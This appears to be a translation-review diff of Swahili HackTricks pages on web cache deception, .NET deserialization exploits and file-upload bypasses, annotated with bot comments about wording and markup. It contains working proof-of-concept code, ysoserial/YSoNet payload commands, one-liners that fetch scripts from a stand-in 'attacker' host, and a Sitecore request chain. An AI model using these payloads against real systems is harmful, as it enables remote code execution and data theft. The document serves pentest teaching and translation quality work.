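Review bot: the RFC link in both versions of the Illegal Header Fields paragraph points at a non-existent domain, `https://datatracker.ietf.mrg/doc/html/rfc7230`; it should be `https://datatracker.ietf.org/doc/html/rfc7230` (and RFC 7230 has since been obsoleted by RFC 9112, if you want the current reference). In Injecting Keyed Parameters, the second version says the backend processes the value in `parameter iliyouzwa` ("the parameter that was sold"), a mistranslation of "URL-encoded parameter"; the first version's `parameter iliyokuwa URL-encoded` is the correct reading and should be kept.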
@ -257,9 +257,9 @@ Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za
## Cache Deception
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
Lengo la Cache Deception ni kufanya clients waloadi resources ambazo zitatunzwa na cache zikiwa na taarifa zao za siri.
Kwanza kumbuka kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hivyo, ikiwa utafikia `www.example.com/profile.php/nonexistent.js` cache inaweza kuhifadhi response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha maudhui nyeti ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** yale maudhui kutoka kwa watumiaji wengine.
Kwanza tambua kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hiyo, ikiwa unafikia `www.example.com/profile.php/nonexistent.js` cache huenda itaweka response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha (replaying) maudhui ya watumiaji yenye taarifa za siri yaliyohifadhiwa kwenye _www.example.com/profile.php_, unaweza **steal** maudhui hayo kutoka kwa watumiaji wengine.
Mambo mengine ya kujaribu:
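Review bot: the second version of the Cache Deception paragraph inserts a gloss, `inarudisha (replaying) maudhui`, and leaves `**steal**` in English, where the first version already had plain `kuiba`; keep the Swahili wording without the parenthetical. The section's lead sentence also exists twice, as `The goal of Cache Deception is to make clients ...` and as `Lengo la Cache Deception ni kufanya clients ...`; only one should remain.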
@ -268,19 +268,19 @@ Mambo mengine ya kujaribu:
- _www.example.com/profile.php/test.js_
- _www.example.com/profile.php/../test.js_
- _www.example.com/profile.php/%2e%2e/test.js_
- _Tumia extensions zisizojulikana kama_ `.avif`
- _Use lesser known extensions such as_ `.avif`
Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
Katika mfano, inafafanuliwa kuwa ikiwa unapakia ukurasa usiopo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**yenye taarifa nyeti za mtumiaji**) yatarudishwa na server ya cache itahifadhi matokeo.\
Kisha, **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chake na kuona **taarifa za siri** za watumiaji waliotembelea hapo awali.
Katika mfano huo, imeelezewa kwamba ikiwa utaweka ukurasa usiokuwepo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**na taarifa za siri za mtumiaji**) yatarudishwa na cache server itaokoa matokeo hayo.\
Kisha, the **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye browser yao mwenyewe na kuangalia **taarifa za siri** za watumiaji waliotembelea hapo awali.
Tambua kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **kwa msingi** wa **extension** ya file (_.css_) na siyo msingi wa content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na content-type `text/html` badala ya `text/css` mime type.
Kumbuka kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **based** kwenye **extension** ya file (_.css_) na sio kulingana na content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na `text/html` content-type badala ya `text/css` mime type.
Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
## Vifaa Otomatiki
## Zana za Otomatiki
- [**toxicache**](https://github.com/xhzeem/toxicache): Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
- [**toxicache**](https://github.com/xhzeem/toxicache): Skana ya Golang ya kutafuta web cache poisoning vulnerabilities katika orodha ya URL na kujaribu injection techniques mbalimbali.
## References
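Review bot: the link sentence `Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling]` is missing the space before `[`, has a stray space inside the link text, and pluralises "Cache Deceptions"; it should read `... jinsi ya kufanya [Cache Deception attacks abusing HTTP Request Smuggling](...)`. The same two-language duplication appears here as elsewhere in the file: `_Use lesser known extensions such as_ \`.avif\`` beside `_Tumia extensions zisizojulikana kama_ \`.avif\``, the two `non-existent.css` paragraphs, and the toxicache bullet in English and Swahili.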

View File

@ -2,37 +2,37 @@
{{#include ../../banners/hacktricks-training.md}}
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya pamoja na gadget hiyo.
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya kwa gadget hiyo.
## ObjectDataProvider Gadget
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.
Ndiyo, ni maelezo ya kushangaza, hivyo tuone nini darasa hili linao kinachovutia: Darasa hili huruhusu **wrap an arbitrary object**, kutumia _**MethodParameters**_ kuweka vigezo vya aina yoyote, na kisha **tumia MethodName kuitisha function yoyote** ya object iliyotajwa kwa kutumia vigezo hivyo.
Kwa hivyo, object yoyote ita**tekeleza** function yenye **parameters** wakati inatengenezwa upya (being deserialized).
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.\
Ndiyo, ni maelezo ya ajabu, hivyo tuangalie nini hasa darasa hili lina chenye kuvutia: Darasa hili huruhusu **kuwrap object yoyote**, kutumia _**MethodParameters**_ ili **kusanidi parameters yoyote,** na kisha **kutumia MethodName kuita function yoyote** ya object hiyo iliyotajwa kwa kutumia parameters hizo.\
Kwa hivyo, **object** yoyote ita **tekeleza** **function** yenye **parameters wakati inapotengenezwa tena (deserialized).**
### **Jinsi hii inawezekana**
### **Jinsi hili linawezekana**
The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, is where the ObjectDataProvider is defined and implemented.
Namespace ya **System.Windows.Data**, iliyopo ndani ya **PresentationFramework.dll** katika `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, ndiko ObjectDataProvider iliyoelezewa na kutekelezwa.
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) unaweza **kuchunguza msimbo** wa darasa tunalolichunguza. Katika picha hapa chini tunaona msimbo wa **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
![](<../../images/image (427).png>)
Kama unavyoona, wakati `MethodName` inawekwa `base.Refresh()` inaitwa; tuchukulie tuangalie inafanya nini:
Kama unavyoweza kuona, inapowekwa `MethodName` inaitwa `base.Refresh()`, hebu tuangalie inafanya nini:
![](<../../images/image (319).png>)
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hapa ndilo linachofanya:
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hivi ndivyo inavyofanya:
![](<../../images/image (345).png>)
Kumbuka mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Tazama inatekeleza nini wakati inaitwa:
Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tazama hiyo inatekeleza nini:
![](<../../images/image (596).png>)
Kumbuka hii si msimbo kamili wa function `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** — hapa ndilo mstari ambapo **method iliyowekwa inaitwa**.
Kumbuka kuwa hii si msimbo kamili wa function ya `QueryWorker` lakini inaonyesha sehemu inayovutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mstari ambapo **seti ya method inatekelezwa**.
If you want to check that just setting the _**MethodName**_ **it will be executed**, you can run this code:
Ikiwa unataka kuthibitisha kuwa kwa tu kuweka _**MethodName**_ **itatekelezwa**, unaweza kuendesha msimbo huu:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -52,16 +52,16 @@ myODP.MethodName = "Start";
}
}
```
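Review bot: both versions of the QueryWorker paragraph name the method `this.QueryWorke(null)`; the method is `QueryWorker`, as the following paragraph itself says. In that following paragraph the second version renders "this is the line where the set method is invoked" as `hii ndiyo mstari ambapo **seti ya method inatekelezwa**` ("the set of methods is executed"), which changes the meaning; the first version's `hapa ndilo mstari ambapo **method iliyowekwa inaitwa**` is correct. Also, the code block that follows (`using System.Windows.Data; using System.Diagnostics;` ... `myODP.MethodName = "Start";`) is C#, not Java, so the fence should be tagged `csharp` rather than `java`; the same applies to the other C# blocks further down in this file.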
Kumbuka kwamba unahitaji kuongeza kama reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
Kumbuka kwamba unahitaji kuongeza kama marejeo _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
## ExpandedWrapper
Ukitegemea exploit iliyotangulia, kutatokea kesi ambapo the **object** itakayokuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, object ilideserializa kwa kutumia `GetType`). Kisha, haitakuwa na habari kuhusu aina ya object iliyofungwa ndani ya mfano wa _ObjectDataProvider_ (kwa mfano `Process`). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Kutumia exploit iliyotangulia kutakuwa na matukio ambapo **object** itakuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, ukitumia XmlSerializer, object ilideserialize kwa kutumia `GetType`). Kisha, haitakuwa na **maarifa ya aina ya object iliyofungwa** katika mfano wa _ObjectDataProvider_ (kwa mfano `Process`). You can find more [information about the DotNetNuke vuln here](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
Class hii inaruhusu **kuainisha aina za object za vitu vinavyofungwa** katika instance fulani. Hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutakuwa na uwezo wa **wrap _ObjectDataProvider_ inside an _ExpandedWrapper_ instance** na **when deserialized** class hii itakuwa inafanya **create** object ya _**OjectDataProvider**_ ambayo ita**execute** function iliyoonyeshwa katika _**MethodName**_.
Hii class inaruhusu ku**bainisha aina za object za vitu vinavyofungwa** katika instance fulani. Kwa hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
Hii ni muhimu sana kwa kesi kama ile iliyotangulia, kwa sababu tutaweza **wrap \_ObjectDataProvider**_** inside an **_**ExpandedWrapper** \_ instance and **when deserialized** this class will **create** the _**OjectDataProvider**_ object that will **execute** the **function** indicated in _**MethodName**_.
You can check this wrapper with the following code:
Unaweza kuangalia wrapper hii kwa kutumia code ifuatayo:
```java
using System.Windows.Data;
using System.Diagnostics;
@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start";
```
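Review bot: both versions of the ExpandedWrapper paragraph misspell the class as `_**OjectDataProvider**_` (missing "b"); it is `ObjectDataProvider`. The second version's emphasis markup is also broken: `**wrap \_ObjectDataProvider**_** inside an **_**ExpandedWrapper** \_ instance` has escaped underscores and unbalanced asterisks and will not render, whereas the first version's `**wrap _ObjectDataProvider_ inside an _ExpandedWrapper_ instance**` does. Consider linking the DotNetNuke write-up directly at `https://paper.seebug.org/365/` instead of through `translate.google.com`.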
## Json.Net
Katika [official web page](https://www.newtonsoft.com/json) inaonyesha kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hiyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
Katika [ukurasa rasmi](https://www.newtonsoft.com/json) imeonyeshwa kwamba maktaba hii inaruhusu **Serialize and deserialize any .NET object with Json.NET's powerful JSON serializer**. Kwa hivyo, ikiwa tunaweza **deserialize the ObjectDataProvider gadget**, tunaweza kusababisha **RCE** kwa ku-deserialize tu object.
### Json.Net example
Kwanza kabisa tuchunguze mfano jinsi ya **serialize/deserialize** object kutumia maktaba hii:
Kwanza, tuchukulie mfano wa jinsi ya **serialize/deserialize** object kwa kutumia maktaba hii:
```java
using System;
using Newtonsoft.Json;
@ -134,7 +134,7 @@ Console.WriteLine(desaccount.Email);
```
### Kutumia vibaya Json.Net
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) nilitengeneza exploit:
Kutumia [ysoserial.net](https://github.com/pwntester/ysoserial.net) niliunda exploit:
```java
yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
@ -147,7 +147,7 @@ yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}
```
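Review bot: the command in this block is `yoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"`, but the tool linked two lines above is ysoserial.net, whose binary is `ysoserial.exe`; fix the spelling so the command is copy-pasteable. The fence is tagged `java` although it holds a shell command followed by JSON output; `json` (or no tag) would be more accurate.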
Katika msimbo huu unaweza **jaribu exploit**, endesha tu na utaona kwamba calc itaanzishwa:
Katika msimbo huu unaweza **test the exploit**, endesha tu na utaona kwamba calc inatekelezwa:
```java
using System;
using System.Text;
@ -184,27 +184,27 @@ TypeNameHandling = TypeNameHandling.Auto
}
}
```
## Mnyororo ya Gadget za Advanced .NET (YSoNet & ysoserial.net)
## Advanced .NET Gadget Chains (YSoNet & ysoserial.net)
Mbinu ya ObjectDataProvider + ExpandedWrapper iliyotanguliwa hapo juu ni moja tu kati ya MNYA mnyororo za gadget zinazoweza kutumiwa wakati programu inafanya **unsafe .NET deserialization**. Zana za kisasa za red-team kama **[YSoNet](https://github.com/irsdl/ysonet)** (na ile ya zamani [ysoserial.net](https://github.com/pwntester/ysoserial.net)) zinafanya otomatiki uundaji wa **ready-to-use malicious object graphs** kwa micolonyo mingi ya gadget na miundo ya serialization.
The ObjectDataProvider + ExpandedWrapper technique introduced above is only one of MANY gadget chains that can be abused when an application performs **unsafe .NET deserialization**. Modern red-team tooling such as **[YSoNet](https://github.com/irsdl/ysonet)** (and the older [ysoserial.net](https://github.com/pwntester/ysoserial.net)) automate the creation of **ready-to-use malicious object graphs** for dozens of gadgets and serialization formats.
Hapo chini ni rejea iliyoshinikizwa ya mnyororo muhimu zaidi zinazotoka ndani ya *YSoNet* pamoja na ufafanuzi mfupi wa jinsi zinavyofanya kazi na mifano ya amri za kuunda payload.
Below is a condensed reference of the most useful chains shipped with *YSoNet* together with a quick explanation of how they work and example commands to generate the payloads.
| Gadget Chain | Wazo Kuu / Primitive | Serializers Za Kawaida | YSoNet one-liner |
|--------------|----------------------|------------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara ikirejeshwa, delegate itamwelekeza kwenye *method* yoyote iliyotolewa na mshambuliaji (kwa mfano `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia vibaya `System.Workflow.ComponentModel.ActivitySurrogateSelector` ili *kuipita type-filtering ya .NET ≥4.8* na kuitisha moja kwa moja **constructor** ya darasa lililotolewa au **kucompile** faili ya C# kwa wakati huo | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inatumia uwakilishi wa **XML wa zamani** wa `System.Data.DataSet` kuanzisha aina yoyote kwa kujaza sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari kuiga assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Kwa runtimes zilizo na WPF (> .NET 5) inachomeka getters za mali hadi kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inacompile* au *inapakia* DLL iliyotolewa na `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method static yoyote yenye arguments zinazodhibiwa. YSoNet inaongeza chaguo la `--xamlurl` ili kuhost malicioius XAML kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambalo linafanywa wakati PowerShell inadeserialise object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
| Gadget Chain | Key Idea / Primitive | Common Serializers | YSoNet one-liner |
|--------------|----------------------|--------------------|------------------|
| **TypeConfuseDelegate** | Inaharibu rekodi ya `DelegateSerializationHolder` ili, mara inaporudiwa/kutanuliwa, delegate ianze kuelekeza kwa method yoyote iliyotolewa na mshambuliaji (mf. `Process.Start`) | `BinaryFormatter`, `SoapFormatter`, `NetDataContractSerializer` | `ysonet.exe TypeConfuseDelegate "calc.exe" > payload.bin` |
| **ActivitySurrogateSelector** | Inatumia `System.Workflow.ComponentModel.ActivitySurrogateSelector` kuvuka *type-filtering* ya .NET ≥4.8 na kuwaita moja kwa moja **constructor** ya class iliyotolewa au **kucompila** faili ya C# kwa wakati mmoja | `BinaryFormatter`, `NetDataContractSerializer`, `LosFormatter` | `ysonet.exe ActivitySurrogateSelectorFromFile ExploitClass.cs;System.Windows.Forms.dll > payload.dat` |
| **DataSetOldBehaviour** | Inategemea uwakilishi wa **XML wa legacy** wa `System.Data.DataSet` kuanzisha types zozote kwa kujaza katika sehemu za `<ColumnMapping>` / `<DataType>` (kwa hiari ikidanganya assembly kwa `--spoofedAssembly`) | `LosFormatter`, `BinaryFormatter`, `XmlSerializer` | `ysonet.exe DataSetOldBehaviour "<DataSet>…</DataSet>" --spoofedAssembly mscorlib > payload.xml` |
| **GetterCompilerResults** | Katika runtimes zinazounga mkono WPF (> .NET 5) inafuatilia getters za property mpaka kufikia `System.CodeDom.Compiler.CompilerResults`, kisha *inaweka kucompile* au *inakamilisha* DLL iliyotolewa kwa `-c` | `Json.NET` typeless, `MessagePack` typeless | `ysonet.exe GetterCompilerResults -c Loader.dll > payload.json` |
| **ObjectDataProvider** (review) | Inatumia WPF `System.Windows.Data.ObjectDataProvider` kuita method statiki yoyote kwa arguments zinazodhibitiwa. YSoNet inaongeza variant ya `--xamlurl` inayohost mali ya XAML mbaya kwa mbali | `BinaryFormatter`, `Json.NET`, `XAML`, *etc.* | `ysonet.exe ObjectDataProvider --xamlurl http://attacker/o.xaml > payload.xaml` |
| **PSObject (CVE-2017-8565)** | Inaweka `ScriptBlock` ndani ya `System.Management.Automation.PSObject` ambacho kinatekelezwa wakati PowerShell inafanya deserialize ya object | PowerShell remoting, `BinaryFormatter` | `ysonet.exe PSObject "Invoke-WebRequest http://attacker/evil.ps1" > psobj.bin` |
> [!TIP]
> Payload zote huandikwa kwa **stdout** kwa chaguo-msingi, kufanya iwe rahisi kuzitumia kwa kupipa (pipe) kwenye zana nyingine (mfano ViewState generators, base64 encoders, HTTP clients).
> All payloads are **written to *stdout*** by default, making it trivial to pipe them into other tooling (e.g. ViewState generators, base64 encoders, HTTP clients).
### Kujenga / Kuisakinisha YSoNet
### Building / Installing YSoNet
Ikiwa hakuna binaries zilizojengwa tayari zinapatikana chini ya *Actions ➜ Artifacts* / *Releases*, PowerShell one-liner ifuatayo itaweka mazingira ya kujenga, kukuza repository na kucompile kila kitu katika mode ya *Release*:
If no pre-compiled binaries are available under *Actions ➜ Artifacts* / *Releases*, the following **PowerShell** one-liner will set up a build environment, clone the repository and compile everything in *Release* mode:
```powershell
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
@ -216,22 +216,22 @@ cd ysonet
nuget restore ysonet.sln
msbuild ysonet.sln -p:Configuration=Release
```
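Review bot: in the second gadget table the GetterCompilerResults row says the chain `inaweka kucompile au inakamilisha DLL iliyotolewa kwa -c` ("sets to compile or completes the DLL"), which loses the meaning; the first table's `inacompile au inapakia DLL` (compiles or loads the DLL) should be kept. The first table's ObjectDataProvider row has the typo `malicioius XAML`. The build paragraph's Swahili version says the one-liner will `kukuza repository` ("grow the repository") for "clone the repository"; use `ku-clone repository`. The table is present twice with a Swahili header (`Wazo Kuu / Primitive`) and an English header (`Key Idea / Primitive`); only one should remain.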
The compiled `ysonet.exe` can then be found under `ysonet/bin/Release/`.
Iliyocompiled `ysonet.exe` inaweza kupatikana chini ya `ysonet/bin/Release/`.
### Ugundaji & Kuimarisha
* **Gundua** unexpected child processes of `w3wp.exe`, `PowerShell.exe`, or any process deserialising user-supplied data (e.g. `MessagePack`, `Json.NET`).
* Wezesha na **lazimisha type-filtering** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila inapowezekana wakati legacy `BinaryFormatter` / `NetDataContractSerializer` haziwezi kuondolewa.
* Ambapo inawezekana hamisha kwenda **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotegemea orodha ya kuruhusiwa.
* Zuia WPF assemblies hatari (`PresentationFramework`, `System.Workflow.*`) kupewa load katika web processes ambazo hazipaswi kuhitaji.
### Utambuzi na Kuimarisha Usalama
* **Gundua** mchakato mdogo usiotarajiwa wa `w3wp.exe`, `PowerShell.exe`, au mchakato wowote unaofanya deserialising ya data iliyotolewa na mtumiaji (mfano `MessagePack`, `Json.NET`).
* Weka na **lazimisha kuchuja aina** (`TypeFilterLevel` = *Full*, custom `SurrogateSelector`, `SerializationBinder`, *etc.*) kila wakati ambapo urithi wa `BinaryFormatter` / `NetDataContractSerializer` hauwezi kuondolewa.
* Iwapo inawezekana, hamia kwa **`System.Text.Json`** au **`DataContractJsonSerializer`** kwa converters zinazotumia whitelist.
* Zuia assemblies hatarishi za WPF (`PresentationFramework`, `System.Workflow.*`) zisipakwe katika mchakato za wavuti ambazo haziziitaji.
## Mfano halisi wa sink: Sitecore convertToRuntimeHtml → BinaryFormatter
## Sink ya ulimwengu halisi: Sitecore convertToRuntimeHtml → BinaryFormatter
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko wa Sitecore XP Content Editor yenye uthibitisho:
Sink ya vitendo ya .NET inayoweza kufikiwa katika mtiririko ya Sitecore XP Content Editor yaliyothibitishwa:
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inafunika `new BinaryFormatter().Deserialize(...)`.
- Njia ya kuanzisha: pipeline `convertToRuntimeHtml``ConvertWebControls`, ambayo inatafuta kipengele jirani chenye `id="{iframeId}_inner"` na inasoma attribute ya `value` ambayo inachukuliwa kama data iliyoseriwalishwa iliyofungwa kwa base64. Matokeo hubadilishwa kuwa string na kuyaingiza kwenye HTML.
- Sink API: `Sitecore.Convert.Base64ToObject(string)` inaitumia `new BinaryFormatter().Deserialize(...)`.
- Njia ya kuchochea: pipeline `convertToRuntimeHtml``ConvertWebControls`, ambayo inatafuta kipengele jirani lenye `id="{iframeId}_inner"` na kusoma sifa ya `value` ambayo inachukuliwa kama data iliyoserialiwa iliyoencodewa kwa base64. Matokeo yanageuzwa kuwa string na yaingizwa ndani ya HTML.
Minimal endtoend (iliyothibitishwa):
Mfupi kutoka mwanzo hadi mwisho (iliyothibitishwa):
```
// Load HTML into EditHtml session
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
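Review bot: `TypeFilterLevel` = *Full* in the type-filtering bullet (kept in the rewritten line `Weka na **lazimisha kuchuja aina** (`TypeFilterLevel` = *Full*, …)`) is backwards: in .NET Remoting `Full` is the permissive level that lets every type through the formatter, and the restrictive value is `Low`, so the hardening advice should name `Low`. `mchakato mdogo` renders "child process" as "small process"; keep `child process` or use `mchakato tanzu`. In the Sitecore trigger bullet the arrow between `convertToRuntimeHtml` and `ConvertWebControls` has been dropped in both versions (two adjacent backtick spans), while the heading still carries `→`.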
@ -246,9 +246,9 @@ __PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
// Server returns a handle; visiting FixHtml.aspx?hdl=... triggers deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
- Gadget: mnyororo wowote wa BinaryFormatter unaorejesha string (madhara ya pembeni yanaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kuzalisha payloads.
- Gadget: yoyote BinaryFormatter chain inayorejesha string (sideeffects zinaendeshwa wakati wa deserialization). Angalia YSoNet/ysoserial.net ili kutengeneza payloads.
Kwa mnyororo kamili unaoanza preauth kwa HTML cache poisoning katika Sitecore na unaoelekeza kwa sink hii:
For a full chain that starts preauth with HTML cache poisoning in Sitecore and leads to this sink:
{{#ref}}
../../network-services-pentesting/pentesting-web/sitecore/README.md
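Review bot: the hyphens have fallen out of `endtoend`, `sideeffects` and `preauth` on both sides of the hunk, most likely non-breaking hyphens lost in conversion; restore `end-to-end`, `side-effects` and `pre-auth`. The rewritten bullet `Gadget: yoyote BinaryFormatter chain inayorejesha string` has the word order of the English source; the deleted `mnyororo wowote wa BinaryFormatter unaorejesha string` reads naturally. The `{{#ref}}` block opened at the end of the hunk needs its matching `{{#endref}}` if it is not already in the following context.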


@ -1,13 +1,13 @@
# Kupakia Faili
# Upakiaji wa Faili
{{#include ../../banners/hacktricks-training.md}}
## Mbinu za Jumla za Kupakia Faili
## Mbinu Za Jumla za Upakiaji wa Faili
Extensions nyingine muhimu:
Nyongeza nyingine muhimu:
- **PHP**: _.php_, _.php2_, _.php3_, ._php4_, ._php5_, ._php6_, ._php7_, .phps, ._pht_, ._phtm, .phtml_, ._pgif_, _.shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, .inc_, .hphp_, .ctp_
- **Working in PHPv8**: _.php_, _.php4_, _.php5_, .phtml_, .module_, _.inc_, _.hphp_, _.ctp_
- **ASP**: _.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml_
- **Jsp:** _.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action_
- **Coldfusion:** _.cfm, .cfml, .cfc, .dbm_
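Review bot: the italics fix applied to the PHPv8 line (`_.inc_`, `_.hphp_`, `_.ctp_`) leaves the PHP line just above it inconsistent (`._php4_`, `._pht_`, `._phtm, .phtml_`, bare `.phps`, `.htaccess`, `.phar`); apply the same `_.ext_` form there so the markdown renders the whole list uniformly.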
@ -17,11 +17,11 @@ Extensions nyingine muhimu:
### Bypass file extensions checks
1. Ikiwa zinatumika, **kagua** **extensions zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Kagua **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia extensions zilizotajwa pia):_
1. Ikiwa inatumika, angalia **nyongeza zilizotajwa hapo awali.** Pia zijaribu kwa kutumia **herufi kubwa**: _pHp, .pHP5, .PhAr ..._
2. _Angalia **kuongeza extension halali kabla** ya extension ya utekelezaji (tumia pia nyongeza zilizotajwa hapo awali):_
- _file.png.php_
- _file.png.Php5_
3. Jaribu kuongeza **herufi maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa **ascii** na **Unicode** herufi. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa hapo awali_)
3. Jaribu kuongeza **alama maalum mwishoni.** Unaweza kutumia Burp kufanya **bruteforce** kwa tabia zote za **ascii** na **Unicode**. (_Kumbuka kwamba unaweza pia kujaribu kutumia **extensions** zilizotajwa awali_)
- _file.php%20_
- _file.php%0a_
- _file.php%00_
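Review bot: `tabia zote za **ascii** na **Unicode**` mistranslates "characters": `tabia` means behaviour or trait, and the deleted line's `herufi` is the right word. Step 2 also mixes `nyongeza` and `extension` in the same sentence; pick one term for the whole file (the list header and the later steps use `extension`).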
